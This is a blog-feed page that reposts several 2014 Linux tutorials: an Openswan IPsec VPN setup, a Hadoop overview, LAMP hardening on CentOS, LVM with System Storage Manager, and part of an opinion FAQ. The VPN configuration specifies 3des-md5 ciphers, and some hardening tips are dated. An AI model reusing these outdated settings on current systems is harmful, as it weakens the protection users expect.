Quantcast
Channel: Sameh Attia
Viewing all 1407 articles
Browse latest View live

How to create a site-to-site IPsec VPN tunnel using Openswan in Linux

$
0
0
http://xmodulo.com/2014/08/create-site-to-site-ipsec-vpn-tunnel-openswan-linux.html

A virtual private network (VPN) tunnel is used to securely interconnect two physically separate networks through a tunnel over the Internet. Tunneling is needed when the separate networks are private LAN subnets with globally non-routable private IP addresses, which are not reachable to each other via traditional routing over the Internet. For example, VPN tunnels are often deployed to connect different NATed branch office networks belonging to the same institution.
Sometimes VPN tunneling may be used simply for its security benefit as well. Service providers or private companies may design their networks in such a way that vital servers (e.g., database, VoIP, banking servers) are placed in a subnet that is accessible to trusted personnel through a VPN tunnel only. When a secure VPN tunnel is required, IPsec is often a preferred choice because an IPsec VPN tunnel is secured with multiple layers of security.
This tutorial will show how we can easily create a site-to-site VPN tunnel using Openswan in Linux.

Topology

This tutorial will focus on the following topologies for creating an IPsec tunnel.



Installing Packages and Preparing VPN Servers

Usually, you will be managing site-A only, but based on the requirements, you could be managing both site-A and site-B. We start the process by installing Openswan.
On Red Hat based Systems (CentOS, Fedora or RHEL):
# yum install openswan lsof
On Debian based Systems (Debian, Ubuntu or Linux Mint):
# apt-get install openswan
Now we disable VPN redirects, if any, in the server using these commands:
# for vpn in /proc/sys/net/ipv4/conf/*;
# do echo 0 > $vpn/accept_redirects;
# echo 0 > $vpn/send_redirects;
# done
Next, we modify the kernel parameters to allow IP forwarding and disable redirects permanently.
# vim /etc/sysctl.conf
1
2
3
net.ipv4.ip_forward = 1
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.all.send_redirects = 0
Reload /etc/sysctl.conf:
# sysctl -p
We allow necessary ports in the firewall. Please make sure that the rules are not conflicting with existing firewall rules.
# iptables -A INPUT -p udp --dport 500 -j ACCEPT
# iptables -A INPUT -p tcp --dport 4500 -j ACCEPT
# iptables -A INPUT -p udp --dport 4500 -j ACCEPT
Finally, we create firewall rules for NAT.
# iptables -t nat -A POSTROUTING -s site-A-private-subnet -d site-B-private-subnet -j SNAT --to site-A-Public-IP
Please make sure that the firewall rules are persistent.
Note:
  • You could use MASQUERADE instead of SNAT. Logically it should work, but it caused me to have issues with virtual private servers (VPS) in the past. So I would use SNAT if I were you.
  • If you are managing site-B as well, create similar rules in site-B server.
  • Direct routing does not need SNAT.

Preparing Configuration Files

The first configuration file that we will work with is ipsec.conf. Regardless of which server you are configuring, always consider your site as 'left' and remote site as 'right'. The following configuration is done in siteA's VPN server.
# vim /etc/ipsec.conf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
## general configuration parameters ##
 
config setup
        plutodebug=all
        plutostderrlog=/var/log/pluto.log
        protostack=netkey
        nat_traversal=yes
        virtual_private=%v4:10.0.0.0/8,%v4:192.168.0.0/16,%v4:172.16.0.0/16
        ## disable opportunistic encryption in Red Hat ##
        oe=off
 
## disable opportunistic encryption in Debian ##
## Note: this is a separate declaration statement ##
include /etc/ipsec.d/examples/no_oe.conf
 
## connection definition in Red Hat ##
conn demo-connection-redhat
        authby=secret
        auto=start
        ike=3des-md5
        ## phase 1 ##
        keyexchange=ike
        ## phase 2 ##
        phase2=esp
        phase2alg=3des-md5
        compress=no
        pfs=yes
        type=tunnel
        left=
        leftsourceip=
        leftsubnet=/netmask
        ## for direct routing ##
        leftsubnet=/32
        leftnexthop=%defaultroute
        right=
        rightsubnet=/netmask
 
## connection definition in Debian ##
conn demo-connection-debian
        authby=secret
        auto=start
        ## phase 1 ##
        keyexchange=ike
        ## phase 2 ##
        esp=3des-md5
        pfs=yes
        type=tunnel
        left=
        leftsourceip=
        leftsubnet=/netmask
        ## for direct routing ##
        leftsubnet=/32
        leftnexthop=%defaultroute
        right=
        rightsubnet=/netmask
Authentication can be done in several different ways. This tutorial will cover the use of pre-shared key, which is added to the file /etc/ipsec.secrets.
# vim /etc/ipsec.secrets
1
2
3
siteA-public-IP  siteB-public-IP:  PSK  "pre-shared-key"
## in case of multiple sites ##
siteA-public-IP  siteC-public-IP:  PSK  "corresponding-pre-shared-key"

Starting the Service and Troubleshooting

The server should now be ready to create a site-to-site VPN tunnel. If you are managing siteB as well, please make sure that you have configured the siteB server with necessary parameters. For Red Hat based systems, please make sure that you add the service into startup using chkconfig command.
# /etc/init.d/ipsec restart
If there are no errors in both end servers, the tunnel should be up now. Taking the following into consideration, you can test the tunnel with ping command.
  1. The siteB-private subnet should not be reachable from site A, i.e., ping should not work if the tunnel is not up.
  2. After the tunnel is up, try ping to siteB-private-subnet from siteA. This should work.
Also, the routes to the destination's private subnet should appear in the server's routing table.
# ip route
[siteB-private-subnet] via [siteA-gateway] dev eth0 src [siteA-public-IP]
default via [siteA-gateway] dev eth0
Additionally, we can check the status of the tunnel using the following useful commands.
# service ipsec status
IPsec running  - pluto pid: 20754
pluto pid 20754
1 tunnels up
some eroutes exist
# ipsec auto --status
## output truncated ##
000 "demo-connection-debian": myip=; hisip=unset;
000 "demo-connection-debian": ike_life: 3600s; ipsec_life: 28800s; rekey_margin: 540s; rekey_fuzz: 100%; keyingtries: 0; nat_keepalive: yes
000 "demo-connection-debian": policy: PSK+ENCRYPT+TUNNEL+PFS+UP+IKEv2ALLOW+SAREFTRACK+lKOD+rKOD; prio: 32,28; interface: eth0;

## output truncated ##
000 #184: "demo-connection-debian":500 STATE_QUICK_R2 (IPsec SA established); EVENT_SA_REPLACE in 1653s; newest IPSEC; eroute owner; isakmp#183; idle; import:not set

## output truncated ##
000 #183: "demo-connection-debian":500 STATE_MAIN_I4 (ISAKMP SA established); EVENT_SA_REPLACE in 1093s; newest ISAKMP; lastdpd=-1s(seq in:0 out:0); idle; import:not set
The log file /var/log/pluto.log should also contain useful information regarding authentication, key exchanges and information on different phases of the tunnel. If your tunnel doesn't come up, you could check there as well.
If you are sure that all the configuration is correct, and if your tunnel is still not coming up, you should check the following things.
  1. Many ISPs filter IPsec ports. Make sure that UDP 500, TCP/UDP 4500 ports are allowed by your ISP. You could try connecting to your server IPsec ports from a remote location by telnet.
  2. Make sure that necessary ports are allowed in the firewall of the server/s.
  3. Make sure that the pre-shared keys are identical in both end servers.
  4. The left and right parameters should be properly configured on both end servers.
  5. If you are facing problems with NAT, try using SNAT instead of MASQUERADING.
To sum up, this tutorial focused on the procedure of creating a site-to-site IPSec VPN tunnel in Linux using Openswan. VPN tunnels are very useful in enhancing security as they allow admins to make critical resources available only through the tunnels. Also VPN tunnels ensure that the data in transit is secured from eavesdropping or interception.
Hope this helps. Let me know what you think.

An introduction to Apache Hadoop for big data

$
0
0
http://opensource.com/life/14/8/intro-apache-hadoop-big-data


Apache Hadoop is an open source software framework for storage and large scale processing of data-sets on clusters of commodity hardware. Hadoop is an Apache top-level project being built and used by a global community of contributors and users. It is licensed under the Apache License 2.0.
Doug Cutting with his son's stuffed elephant, Hadoop
Hadoop was created by Doug Cutting and Mike Cafarella in 2005. It was originally developed to support distribution for the Nutch search engine project. Doug, who was working at Yahoo! at the time and is now Chief Architect of Cloudera, named the project after his son's toy elephant. Cutting's son was 2 years old at the time and just beginning to talk. He called his beloved stuffed yellow elephant "Hadoop" (with the stress on the first syllable). Now 12, Doug's son often exclaims, "Why don't you say my name, and why don't I get royalties? I deserve to be famous for this!"

The Apache Hadoop framework is composed of the following modules

  1. Hadoop Common: contains libraries and utilities needed by other Hadoop modules
  2. Hadoop Distributed File System (HDFS): a distributed file-system that stores data on the commodity machines, providing very high aggregate bandwidth across the cluster
  3. Hadoop YARN: a resource-management platform responsible for managing compute resources in clusters and using them for scheduling of users' applications
  4. Hadoop MapReduce: a programming model for large scale data processing
All the modules in Hadoop are designed with a fundamental assumption that hardware failures (of individual machines, or racks of machines) are common and thus should be automatically handled in software by the framework. Apache Hadoop's MapReduce and HDFS components originally derived respectively from Google's MapReduce and Google File System (GFS) papers.
Beyond HDFS, YARN and MapReduce, the entire Apache Hadoop "platform" is now commonly considered to consist of a number of related projects as well: Apache Pig, Apache Hive, Apache HBase, and others.
An illustration of the Apache Hadoop ecosystem
For the end-users, though MapReduce Java code is common, any programming language can be used with "Hadoop Streaming" to implement the "map" and "reduce" parts of the user's program. Apache Pig and Apache Hive, among other related projects, expose higher level user interfaces like Pig latin and a SQL variant respectively. The Hadoop framework itself is mostly written in the Java programming language, with some native code in C and command line utilities written as shell-scripts.

HDFS and MapReduce

There are two primary components at the core of Apache Hadoop 1.x: the Hadoop Distributed File System (HDFS) and the MapReduce parallel processing framework. These are both open source projects, inspired by technologies created inside Google.

Hadoop distributed file system

The Hadoop distributed file system (HDFS) is a distributed, scalable, and portable file-system written in Java for the Hadoop framework. Each node in a Hadoop instance typically has a single namenode, and a cluster of datanodes form the HDFS cluster. The situation is typical because each node does not require a datanode to be present. Each datanode serves up blocks of data over the network using a block protocol specific to HDFS. The file system uses the TCP/IP layer for communication. Clients use Remote procedure call (RPC) to communicate between each other.

HDFS stores large files (typically in the range of gigabytes to terabytes) across multiple machines. It achieves reliability by replicating the data across multiple hosts, and hence does not require RAID storage on hosts. With the default replication value, 3, data is stored on three nodes: two on the same rack, and one on a different rack. Data nodes can talk to each other to rebalance data, to move copies around, and to keep the replication of data high. HDFS is not fully POSIX-compliant, because the requirements for a POSIX file-system differ from the target goals for a Hadoop application. The tradeoff of not having a fully POSIX-compliant file-system is increased performance for data throughput and support for non-POSIX operations such as Append.
HDFS added the high-availability capabilities for release 2.x, allowing the main metadata server (the NameNode) to be failed over manually to a backup in the event of failure, automatic fail-over.
The HDFS file system includes a so-called secondary namenode, which misleads some people into thinking that when the primary namenode goes offline, the secondary namenode takes over. In fact, the secondary namenode regularly connects with the primary namenode and builds snapshots of the primary namenode's directory information, which the system then saves to local or remote directories. These checkpointed images can be used to restart a failed primary namenode without having to replay the entire journal of file-system actions, then to edit the log to create an up-to-date directory structure. Because the namenode is the single point for storage and management of metadata, it can become a bottleneck for supporting a huge number of files, especially a large number of small files. HDFS Federation, a new addition, aims to tackle this problem to a certain extent by allowing multiple name-spaces served by separate namenodes.
An advantage of using HDFS is data awareness between the job tracker and task tracker. The job tracker schedules map or reduce jobs to task trackers with an awareness of the data location. For example, if node A contains data (x, y, z) and node B contains data (a, b, c), the job tracker schedules node B to perform map or reduce tasks on (a,b,c) and node A would be scheduled to perform map or reduce tasks on (x,y,z). This reduces the amount of traffic that goes over the network and prevents unnecessary data transfer. When Hadoop is used with other file systems, this advantage is not always available. This can have a significant impact on job-completion times, which has been demonstrated when running data-intensive jobs. HDFS was designed for mostly immutable files and may not be suitable for systems requiring concurrent write-operations.
Another limitation of HDFS is that it cannot be mounted directly by an existing operating system. Getting data into and out of the HDFS file system, an action that often needs to be performed before and after executing a job, can be inconvenient. A filesystem in Userspace (FUSE) virtual file system has been developed to address this problem, at least for Linux and some other Unix systems.
File access can be achieved through the native Java API, the Thrift API, to generate a client in the language of the users' choosing (C++, Java, Python, PHP, Ruby, Erlang, Perl, Haskell, C#, Cocoa, Smalltalk, or OCaml), the command-line interface, or browsed through the HDFS-UI web app over HTTP.

JobTracker and TaskTracker: The MapReduce engine

Jobs and tasks in Hadoop
Above the file systems comes the MapReduce engine, which consists of one JobTracker, to which client applications submit MapReduce jobs. The JobTracker pushes work out to available TaskTracker nodes in the cluster, striving to keep the work as close to the data as possible.
With a rack-aware file system, the JobTracker knows which node contains the data, and which other machines are nearby. If the work cannot be hosted on the actual node where the data resides, priority is given to nodes in the same rack. This reduces network traffic on the main backbone network.
If a TaskTracker fails or times out, that part of the job is rescheduled. The TaskTracker on each node spawns off a separate Java Virtual Machine process to prevent the TaskTracker itself from failing if the running job crashes the JVM. A heartbeat is sent from the TaskTracker to the JobTracker every few minutes to check its status. The Job Tracker and TaskTracker status and information is exposed by Jetty and can be viewed from a web browser.
 Hadoop 1.x MapReduce System is composed of the JobTracker, which is the master, and the per-node slaves, TaskTrackers
If the JobTracker failed on Hadoop 0.20 or earlier, all ongoing work was lost. Hadoop version 0.21 added some checkpointing to this process. The JobTracker records what it is up to in the file system. When a JobTracker starts up, it looks for any such data, so that it can restart work from where it left off.

Known limitations of this approach in Hadoop 1.x

The allocation of work to TaskTrackers is very simple. Every TaskTracker has a number of available slots (such as "4 slots"). Every active map or reduce task takes up one slot. The Job Tracker allocates work to the tracker nearest to the data with an available slot. There is no consideration of the current system load of the allocated machine, and hence its actual availability. If one TaskTracker is very slow, it can delay the entire MapReduce job—especially towards the end of a job, where everything can end up waiting for the slowest task. With speculative execution enabled, however, a single task can be executed on multiple slave nodes.

Apache Hadoop NextGen MapReduce (YARN)

MapReduce has undergone a complete overhaul in hadoop-0.23 and we now have, what we call, MapReduce 2.0 (MRv2) or YARN.
Apache™ Hadoop® YARN is a sub-project of Hadoop at the Apache Software Foundation introduced in Hadoop 2.0 that separates the resource management and processing components. YARN was born of a need to enable a broader array of interaction patterns for data stored in HDFS beyond MapReduce. The YARN-based architecture of Hadoop 2.0 provides a more general processing platform that is not constrained to MapReduce.
Architectural view of YARN
The fundamental idea of MRv2 is to split up the two major functionalities of the JobTracker, resource management and job scheduling/monitoring, into separate daemons. The idea is to have a global ResourceManager (RM) and per-application ApplicationMaster (AM). An application is either a single job in the classical sense of Map-Reduce jobs or a DAG of jobs.
The ResourceManager and per-node slave, the NodeManager (NM), form the data-computation framework. The ResourceManager is the ultimate authority that arbitrates resources among all the applications in the system.
The per-application ApplicationMaster is, in effect, a framework specific library and is tasked with negotiating resources from the ResourceManager and working with the NodeManager(s) to execute and monitor the tasks.
Overview of Hadoop1.0 and Hadopp2.0
As part of Hadoop 2.0, YARN takes the resource management capabilities that were in MapReduce and packages them so they can be used by new engines. This also streamlines MapReduce to do what it does best, process data. With YARN, you can now run multiple applications in Hadoop, all sharing a common resource management. Many organizations are already building applications on YARN in order to bring them IN to Hadoop.
A next-generation framework for Hadoop data processing
As part of Hadoop 2.0, YARN takes the resource management capabilities that were in MapReduce and packages them so they can be used by new engines. This also streamlines MapReduce to do what it does best, process data. With YARN, you can now run multiple applications in Hadoop, all sharing a common resource management. Many organizations are already building applications on YARN in order to bring them IN to Hadoop. When enterprise data is made available in HDFS, it is important to have multiple ways to process that data. With Hadoop 2.0 and YARN organizations can use Hadoop for streaming, interactive and a world of other Hadoop based applications.

What YARN does

YARN enhances the power of a Hadoop compute cluster in the following ways:
  • Scalability: The processing power in data centers continues to grow quickly. Because YARN ResourceManager focuses exclusively on scheduling, it can manage those larger clusters much more easily.
  • Compatibility with MapReduce: Existing MapReduce applications and users can run on top of YARN without disruption to their existing processes.
  • Improved cluster utilization: The ResourceManager is a pure scheduler that optimizes cluster utilization according to criteria such as capacity guarantees, fairness, and SLAs. Also, unlike before, there are no named map and reduce slots, which helps to better utilize cluster resources.
  • Support for workloads other than MapReduce: Additional programming models such as graph processing and iterative modeling are now possible for data processing. These added models allow enterprises to realize near real-time processing and increased ROI on their Hadoop investments.
  • Agility: With MapReduce becoming a user-land library, it can evolve independently of the underlying resource manager layer and in a much more agile manner.

How YARN works

The fundamental idea of YARN is to split up the two major responsibilities of the JobTracker/TaskTracker into separate entities:
  • a global ResourceManager
  • a per-application ApplicationMaster
  • a per-node slave NodeManager and
  • a per-application container running on a NodeManager
The ResourceManager and the NodeManager form the new, and generic, system for managing applications in a distributed manner. The ResourceManager is the ultimate authority that arbitrates resources among all the applications in the system. The per-application ApplicationMaster is a framework-specific entity and is tasked with negotiating resources from the ResourceManager and working with the NodeManager(s) to execute and monitor the component tasks. The ResourceManager has a scheduler, which is responsible for allocating resources to the various running applications, according to constraints such as queue capacities, user-limits etc. The scheduler performs its scheduling function based on the resource requirements of the applications. The NodeManager is the per-machine slave, which is responsible for launching the applications' containers, monitoring their resource usage (cpu, memory, disk, network) and reporting the same to the ResourceManager. Each ApplicationMaster has the responsibility of negotiating appropriate resource containers from the scheduler, tracking their status, and monitoring their progress. From the system perspective, the ApplicationMaster runs as a normal container.

How to secure a LAMP server on CentOS or RHEL

$
0
0
http://xmodulo.com/2014/08/secure-lamp-server-centos-rhel.html

LAMP is a software stack composed of Linux (an operating system as a base layer), Apache (a web server that "sits on top" of the OS), MySQL (or MariaDB, as a relational database management system), and finally PHP (a server-side scripting language that is used to process and display information stored in the database).
In this article we will assume that each component of the stack is already up and running, and will focus exclusively on securing the LAMP server(s). We must note, however, that server-side security is a vast subject, and therefore cannot be addressed adequately and completely in a single article.
In this post, we will cover the essential must-do's to secure each part of the stack.

Securing Linux

Since you may want to manage your CentOS server via ssh, you need to consider the following tips to secure remote access to the server by editing the /etc/ssh/sshd_config file.
1) Use key-based authentication, whenever possible, instead of basic authentication (username + password) to log on to your server remotely. We assume that you have already created a key pair with your user name on your client machine and copied it to your server (see the tutorial).
1
2
3
PasswordAuthentication no
RSAAuthentication yes
PubkeyAuthentication yes
2) Change the port where sshd will be listening on. A good idea for the port is a number higher than 1024:
1
Port XXXX
3) Allow only protocol 2:
1
Protocol 2
4) Configure the authentication timeout, do not allow root logins, and restrict which users may login, via ssh:
1
2
3
LoginGraceTime 2m
PermitRootLogin no
AllowUsers gacanepa
5) Allow only specific hosts (and/or networks) to login via ssh:
In the /etc/hosts.deny file:
1
sshd: ALL
In the /etc/hosts.allow file:
1
sshd: XXX.YYY.ZZZ. AAA.BBB.CCC.DDD
where XXX.YYY.ZZZ. represents the first 3 octets of an IPv4 network address and AAA.BBB.CCC.DDD is an IPv4 address. With that setting, only hosts from network XXX.YYY.ZZZ.0/24 and host AAA.BBB.CCC.DDD will be allowed to connect via ssh. All other hosts will be disconnected before they even get to the login prompt, and will receive an error like this:

(Do not forget to restart the sshd daemon to apply these changes: service sshd restart).
We must note that this approach is a quick and easy -but somewhat rudimentary- way of blocking incoming connections to your server. For further customization, scalability and flexibility, you should consider using plain iptables and/or fail2ban.

Securing Apache

1) Make sure that the system user that is running Apache web server does not have access to a shell:
# grep -i apache /etc/passwd
If user apache has a default shell (such as /bin/sh), we must change it to /bin/false or /sbin/nologin:
# usermod -s /sbin/nologin apache

The following suggestions (2 through 5) refer to the /etc/httpd/conf/httpd.conf file:
2) Disable directory listing: this will prevent the browser from displaying the contents of a directory if there is no index.html present in that directory.
Delete the word Indexes in the Options directive:
1
2
3
4
5
# The Options directive is both complicated and important.  Please see
# http://httpd.apache.org/docs/2.2/mod/core.html#options
# for more information.
#
Options Indexes FollowSymLinks
Should read:
1
Options None

In addition, you need to make sure that the settings for directories and virtual hosts do not override this global configuration.
Following the example above, if we examine the settings for the /var/www/icons directory, we see that "Indexes MultiViews FollowSymLinks" should be changed to "None".

Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order allow,deny
Allow from all


Options None
AllowOverride None
Order allow,deny
Allow from all

BeforeAfter
3) Hide Apache version, as well as module/OS information in error (e.g. Not Found and Forbidden) pages.
1
2
ServerTokens Prod # This means that the http response header will return just "Apache" but not its version number
ServerSignature Off # The OS information is hidden

4) Disable unneeded modules by commenting out the lines where those modules are declared:

TIP: Disabling autoindex_module is another way to hide directory listings when there is not an index.html file in them.
5) Limit HTTP request size (body and headers) and set connection timeout:
DirectiveContextExample and meaning
LimitRequestBody server config, virtual host, directory, .htaccess Limit file upload to 100 KiB max. for the uploads directory:
1
2
3
"/var/www/test/uploads">
   LimitRequestBody 102400
</Directory>
This directive specifies the number of bytes from 0 (meaning unlimited) to 2147483647 (2GB) that are allowed in a request body.
LimitRequestFieldSize server config, virtual host Change the allowed HTTP request header size to 4KiB (default is 8KiB), server wide:
1
LimitRequestFieldSize 4094
This directive specifies the number of bytes that will be allowed in an HTTP request header and gives the server administrator greater control over abnormal client request behavior, which may be useful for avoiding some forms of denial-of-service attacks.
TimeOut server config, virtual host Change the timeout from 300 (default if no value is used) to 120:
1
TimeOut 120
Amount of time, in seconds, the server will wait for certain events before failing a request.
For more directives and instructions on how to set them up, refer to the Apache docs.

Securing MySQL Server

We will begin by running the mysql_secure_installation script which comes with mysql-server package.
1) If we have not set a root password for MySQL server during installation, now it's the time to do so, and remember: this is essential in a production environment.

The process will continue:

2) Remove the anonymous user:

3) Only allow root to connect from localhost:

4) Remove the default database named test:

5) Apply changes:

6) Next, we will edit some variables in the /etc/my.cnf file:
1
2
3
4
[mysqld]
bind-address=127.0.0.1 # MySQL will only accept connections from localhost
local-infile=0 # Disable direct filesystem access
log=/var/log/mysqld.log # Enable log file to watch out for malicious activities
Don't forget to restart MySQL server with 'service mysqld restart'.
Now, when it comes to day-to-day database administration, you'll find the following suggestions useful:
  • If for some reason we need to manage our database remotely, we can do so by connecting via ssh to our server first to perform the necessary querying and administration tasks locally.
  • We may want to enable direct access to the filesystem later if, for example, we need to perform a bulk import of a file into the database.
  • Keeping logs is not as critical as the two things mentioned earlier, but may come in handy to troubleshoot our database and/or be aware of unfamiliar activities.
  • DO NOT, EVER, store sensitive information (such as passwords, credit card numbers, bank PINs, to name a few examples) in plain text format. Consider using hash functions to obfuscate this information.
  • Make sure that application-specific databases can be accessed only by the corresponding user that was created by the application to that purpose:
To adjust access permission of MySQL users, use these instructions.
First, retrieve the list of users from the user table:
gacanepa@centos:~$ mysql -u root -p
Enter password: [Your root password here]
mysql> SELECT User,Host FROM mysql.user;

Make sure that each user only has access (and the minimum permissions) to the databases it needs. In the following example, we will check the permissions of user db_usuario:
mysql> SHOW GRANTS FOR 'db_usuario'@'localhost';

You can then revoke permissions and access as needed.

Securing PHP

Since this article is oriented at securing the components of the LAMP stack, we will not go into detail as far as the programming side of things is concerned. We will assume that our web applications are secure in the sense that the developers have gone out of their way to make sure that there are no vulnerabilities that can give place to common attacks such as XSS or SQL injection.
1) Disable unnecessary modules:
We can display the list of current compiled in modules with the following command: php -m

And disable those that are not needed by either removing or renaming the corresponding file in the /etc/php.d directory.
For example, since the mysql extension has been deprecated as of PHP v5.5.0 (and will be removed in the future), we may want to disable it:
# php -m | grep mysql
# mv /etc/php.d/mysql.ini /etc/php.d/mysql.ini.disabled

2) Hide PHP version information:
# echo "expose_php=off">> /etc/php.d/security.ini [or modify the security.ini file if it already exists]

3) Set open_basedir to a few specific directories (in php.ini) in order to restrict access to the underlying file system:

4) Disable remote code/command execution along with easy exploitable functions such as exec(), system(), passthru(), eval(), and so on (in php.ini):
1
2
3
allow_url_fopen = Off
allow_url_include = Off
disable_functions = "exec, system, passthru, eval"


Summing Up

1) Keep packages updated to their most recent version (compare the output of the following commands with the output of 'yum info [package]'):
The following commands return the current versions of Apache, MySQL and PHP:
# httpd -v
# mysql -V (capital V)
# php -v

Then 'yum update [package]' can be used to update the package in order to have the latest security patches.
2) Make sure that configuration files can only be written by the root account:
# ls -l /etc/httpd/conf/httpd.conf
# ls -l /etc/my.cnf
# ls -l /etc/php.ini /etc/php.d/security.ini

3) Finally, if you have the chance, run these services (web server, database server, and application server) in separate physical or virtual machines (and protect communications between them via a firewall), so that in case one of them becomes compromised, the attacker will not have immediate access to the others. If that is the case, you may have to tweak some of the configurations discussed in this article. Note that this is just one of the setups that could be used to increase security in your LAMP server.

How to manage LVM volumes on CentOS / RHEL 7 with System Storage Manager

$
0
0
http://xmodulo.com/2014/09/manage-lvm-volumes-centos-rhel-7-system-storage-manager.html

Logical Volume Manager (LVM) is an extremely flexible disk management scheme, allowing you to create and resize logical disk volumes off of multiple physical hard drives with no downtime. However, its powerful features come with the price of a somewhat steep learning curves, with more involved steps to set up LVM using multiple command line tools, compared to managing traiditional disk partitions.
Here is good news for CentOS/RHEL users. The latest CentOS/RHEL 7 now comes with System Storage Manager (aka ssm) which is a unified command line interface developed by Red Hat for managing all kinds of storage devices. Currently there are three kinds of volume management backends available for ssm: LVM, Btrfs, and Crypt.
In this tutorial, I will demonstrate how to manage LVM volumes with ssm. You will be blown away how simple it is to create and manage LVM volumes now. :-)

Preparing SSM

On fresh CentOS/RHEL 7, you need to install System Storage Manager first.
$ sudo yum install system-storage-manager
First, let's check information about available hard drives and LVM volumes. The following command will show information about existing disk storage devices, storage pools, LVM volumes and storage snapshots. The output is from fresh CentOS 7 installation which uses LVM and XFS file system by default.
$ sudo ssm list

In this example, there are two physical devices ("/dev/sda" and "/dev/sdb"), one storage pool ("centos"), and two LVM volumes ("/dev/centos/root" and "/dev/centos/swap") created in the pool.

Add a Physical Disk to an LVM Pool

Let's add a new physical disk (e.g., /dev/sdb) to an existing storage pool (e.g., centos). The command to add a new physical storage device to an existing pool is as follows.
$ sudo ssm add -p

After a new device is added to a pool, the pool will automatically be enlarged by the size of the device. Check the size of the storage pool named centos as follows.

As you can see, the centos pool has been successfully expanded from 7.5GB to 8.5GB. At this point, however, disk volumes (e.g., /dev/centos/root and /dev/centos/swap) that exist in the pool are not utilizing the added space. For that, we need to expand existing LVM volumes.

Expand an LVM Volume

If you have extra space in a storage pool, you can enlarge existing disk volumes in the pool. For that, use resize option with ssm command.
$ sudo ssm resize -s [size] [volume]
Let's increase the size of /dev/centos/root volume by 500MB.
$ sudo ssm resize -s+500M /dev/centos/root

Verify the updated size of existing volumes.
$ sudo ssm list volumes

We can confirm that the size of /dev/centos/root volume has increased from 6.7GB to 7.2GB. However, this does not mean that you can immediately utilize the extra space within the file system created inside the volume. You can see that the file system size ("FS size") still remains as 6.7GB.
To make the file system recognize the increased volume size, you need to "expand" an existing file system itself. Depending on which file system you are using, there are different tools to expand an existing filesystem. For example, use resize2fs for EXT2/EXT3/EXT4, xfs_growfs for XFS, btrfs for Btrfs, etc.
In this example, we are using CentOS 7, where XFS file system is created by default. Thus, we use xfs_growfs to expand an existing XFS file system.
After expanding an XFS file system, verify that file system fully occupies the entire disk volume 7.2GB.


Create a New LVM Pool/Volume

In this experiment, let's see how we can create a new storage pool and a new LVM volume on top of a physical disk drive. With traditional LVM tools, the entire procedure is quite involved; preparing partitions, creating physical volumes, volume groups, and logical volumes, and finally building a file system. However, with ssm, the entire procedure can be completed at one shot!
What the following command does is to create a storage pool named mypool, create a 500MB LVM volume named disk0 in the pool, format the volume with XFS file system, and mount it under /mnt/test. You can immediately see the power of ssm.
$ sudo ssm create -s 500M -n disk0 --fstype xfs -p mypool /dev/sdc /mnt/test

Let's verify the created disk volume.


Take a Snapshot of an LVM Volume

Using ssm tool, you can also take a snapshot of existing disk volumes. Note that snapshot works only if the back-end that the volumes belong to support snapshotting. The LVM backend supports online snapshotting, which means we do not have to take the volume being snapshotted offline. Also, since the LVM backend of ssm supports LVM2, the snapshots are read/write enabled.
Let's take a snapshot of an existing LVM volume (e.g., /dev/mypool/disk0).
$ sudo ssm snapshot /dev/mypool/disk0
Once a snapshot is taken, it is stored as a special snapshot volume which stores all the data in the original volume at the time of snapshotting.

After a snapshot is stored, you can remove the original volume, and mount the snapshot volume to access the data in the snapshot.

Note that when you attempt to mount the snapshot volume while the original volume is mounted, you will get the following error message.
kernel: XFS (dm-3): Filesystem has duplicate UUID 27564026-faf7-46b2-9c2c-0eee80045b5b - can't mount

Remove an LVM Volume

Removing an existing disk volume or storage pool is as easy as creating one. If you attempt to remove a mounted volume, ssm will automatically unmount it first. No hassle there.
To remove an LVM volume:
$ sudo ssm remove
To remove a storage pool:
$ sudo ssm remove

Conclusion

Hopefully by now you see the power of ssm. In enterprise storage environments, it is quite common to deal with a wide array of storage devices, disk volumes and file systems. Instead of struggling with a number of different tools to manage a complex mix of storage configurations, you can master the single command-line tool ssm, and have its backends get the job done for you. ssm is definitely a must-have tool for any system administrators working in a complex storage management environment.

10 Answers To The Most Frequently Asked Linux Questions On Google

$
0
0
http://www.everydaylinuxuser.com/2014/09/10-answers-to-most-frequently-asked.html

Introduction

Go to Google and type in a query. As you type you will notice that Google suggests some questions and topics for you.

The suggestions that appear are based on the most searched for topics based on the keywords provided. There is a caviat and that is each person may receive a slightly different list based on things they have naturally searched for in the past.

The concept of todays article is to provide answers to the most commonly asked questions using terms such as Why is Linux, What does Linux, Can Linux and Which Linux.

I borrowed the concept of this article from the Going Linux podcast which did something similar in episode 253.


1. Why Is Linux Better Than Windows?

I have incorporated the first three items on the list into the answer for this question because on their own they are meaningless.

Why is Linux better than Windows?

This question is at the best subjective and many Windows users would probably suggest otherwise. In fact there was an article that appeared last week, by John Dvorak, who suggested that Linux had failed to win over the desktop and was nothing more than an operating system for hobbyists.

You can read my response to that article by clicking here.

Here are some reasons where it can be argued that Linux is better than Windows:
  • Performance
  • Security
  • Customisability
  • Price
  • Community 
  • Support
Linux can be made to work on the oldest hardware or the most modern hardware. By tweaking the desktop environment and the applications you use it is possible to make Linux perform in a much more efficient way than Windows.

Another reason Linux performs better is the fact that it doesn't deteriorate over time.

When you first get a computer with Windows on it the performance is usually pretty decent.

Antivirus software instantly places a load onto the computer that just isn't required on a day to day basis for home Linux computers.

Windows tends to slow down after a period of use. This is due to installing applications, system updates and various other tasks that fill up the registry and leave junk on the computer.

Windows 7 is definitely an improvement on Window Vista and XP because it automatically defragments the hard drive but it is noticeably slower running either Windows 7 or Windows 8 compared with any version of Linux that I run on the same machines.

With regards to security, Linux is better for various reasons. The use of a normal account as opposed to an administrator account certainly helps as it limits the amount of exposure to potential hackers.

Viruses are less likely to affect Linux than Windows as well and this can be attributed to the use of package managers in Linux, the ability for viruses to spread and the level of chaos that virus developers can generate by writing viruses for Linux. This is covered again later on in the article.

If I want to download a Windows application then I have a choice of the whole internet to download from but how do you know a reputable site for a non-reputable site. Even so called reputable sites bundle search tools, optimisers and toolbars with the applications that you download from them. The use of package managers as repositories is a far better way to distribute software.

Linux is ultimately more customisable than Windows. Everything on Linux can be built the way you want it to be. You can choose the display manager (login manager), the window manager, the docks that appear, the terminal, the applications, the fonts, menus and widgets. In Windows you can change the desktop wallpaper, what else?

